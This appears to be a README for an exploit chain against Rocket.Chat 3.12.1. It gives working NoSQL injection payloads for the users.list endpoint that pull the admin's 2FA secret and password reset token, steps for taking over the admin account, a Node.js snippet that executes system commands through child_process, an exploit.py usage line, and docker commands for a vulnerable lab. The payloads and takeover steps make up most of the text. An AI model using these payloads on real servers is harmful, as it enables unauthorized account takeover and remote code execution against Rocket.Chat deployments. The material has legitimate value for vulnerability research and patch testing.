Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1
1) Hijacking user's account ( Unauthenticated )
2) Privilege Escalation to admin ( Authenticated )
So admin user is most likely to be protected by 2fa. So even if we change admin's password through (1) it will prompt for 2fa code on login.
users.list api endpoint takes query parameter which is vulnerable to nosql injection. We are also able to retrieve data by throwing an error.
We run the following query to get admin's 2fa secret : {"$where":"this.username==='admin' && (()=>{ throw this.services.totp.secret })()"}
Next we just do (1) to reset admin's password and use the 2fa secret to generate code which we can use to login.
Updated : You can also retrieve the reset token through the same way you retrieved 2fa secret : {"$where":"this.username==='admin' && (()=>{ throw this.services.password.reset.token })()"}
3) RCE ( Autenticated - Admin )
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('command here');
python3 exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://rocket.local"
docker run --name db -d mongo:3.6 --smallfiles --replSet rs0 --oplogSize 128
docker exec -ti db mongo --eval "printjson(rs.initiate())"
docker run --name rocketchat -p 80:3000 --link db --env ROOT_URL=http://localhost --env MONGO_OPLOG_URL=mongodb://db:27017/local -d rocket.chat:3.12.1
- Enable Password Policy
- Enable 2FA for Admin
- Register a normal user.
NOTE: If you don't want Administrator protected with 2FA you can do the following.
1) Send forget password mail
2) Get resettoken for admin
3) Change the password using the reset token retrieved
```py
# Admin Account Takover [ No 2fa ]
forgotpassword(adminmail,target)
token = resettoken(target)
changingpassword(target,token)